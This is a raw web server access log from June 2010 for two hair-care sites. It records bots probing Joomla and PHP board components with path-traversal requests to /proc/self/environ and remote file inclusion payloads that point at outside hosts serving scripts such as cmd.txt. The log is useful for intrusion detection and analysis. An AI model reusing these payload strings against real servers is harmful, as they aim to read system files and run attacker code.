66.191.139.210 - - [28/Jun/2010:05:30:22 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:30:34 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:30:35 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
93.186.192.124 - - [28/Jun/2010:05:32:08 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:32:08 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:32:08 -0700] "GET /logs/access_100531.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:32:42 -0700] "GET /logs/access_100531.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:32:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:32:42 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:34:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:34:46 -0700] "GET /logs/access_100531.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:05:34:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.180.240.110 - - [28/Jun/2010:05:36:06 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:36:06 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:36:06 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:37:01 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:37:01 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:05:37:01 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:37:02 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:37:02 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:37:03 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:38:52 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:38:53 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:38:53 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:38:56 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:38:56 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:38:57 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:44:44 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:44:45 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [28/Jun/2010:05:44:45 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:05:45:00 -0700] "GET /index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:05:46:22 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:48:47 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:48:47 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:48:47 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:48:54 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:48:54 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:05:48:54 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:05:49:01 -0700] "GET /logs/access_100503.log/index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
65.254.36.102 - - [28/Jun/2010:05:49:01 -0700] "GET /index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
65.254.36.102 - - [28/Jun/2010:05:49:01 -0700] "GET /logs/index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:05:52:52 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.201.38.2 - - [28/Jun/2010:05:55:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bannerbuilder.net/images/demo/id?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:05:59:25 -0700] "GET /web/bbs////write_comment_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:05:59:25 -0700] "GET /logs/access_100412.log%20%20//web/bbs////write_comment_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:05:59:25 -0700] "GET /logs//web/bbs////write_comment_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.112 - - [28/Jun/2010:06:03:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000" "www.freehairsecrets.com"
91.212.226.112 - - [28/Jun/2010:06:03:38 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000" "www.freehairsecrets.com"
119.63.198.99 - - [28/Jun/2010:06:03:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15781 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
119.63.198.78 - - [28/Jun/2010:06:03:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14951 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
65.254.36.102 - - [28/Jun/2010:06:04:40 -0700] "GET /logs/access.log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:06:04:40 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:06:04:40 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
97.65.18.158 - - [28/Jun/2010:06:05:54 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
97.65.18.158 - - [28/Jun/2010:06:06:17 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:11:36 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:11:37 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:12:08 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:12:08 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:06:13:25 -0700] "GET /logs/access.log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:06:13:25 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:06:13:25 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:06:20:10 -0700] "GET /logs/access_100503.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:06:20:11 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:06:20:11 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:06:20:31 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:06:20:31 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:43 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
195.225.252.9 - - [28/Jun/2010:06:23:44 -0700] "GET /logs/access.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:06:24:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:06:24:21 -0700] "GET /logs/access_100531.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:01 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:01 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:01 -0700] "GET /index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:01 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:01 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:02 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:02 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:02 -0700] "GET /logs/access_100614.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:02 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:02 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:26:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:26:50 -0700] "GET /skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:26:50 -0700] "GET /logs/access_100412.log%20%20//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:56 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:56 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:26:56 -0700] "GET /skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:26:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:26:56 -0700] "GET /logs/access_100412.log%20%20//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:56 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
195.225.252.9 - - [28/Jun/2010:06:26:57 -0700] "GET /logs/access_100621.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:27:22 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:27:22 -0700] "GET /skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
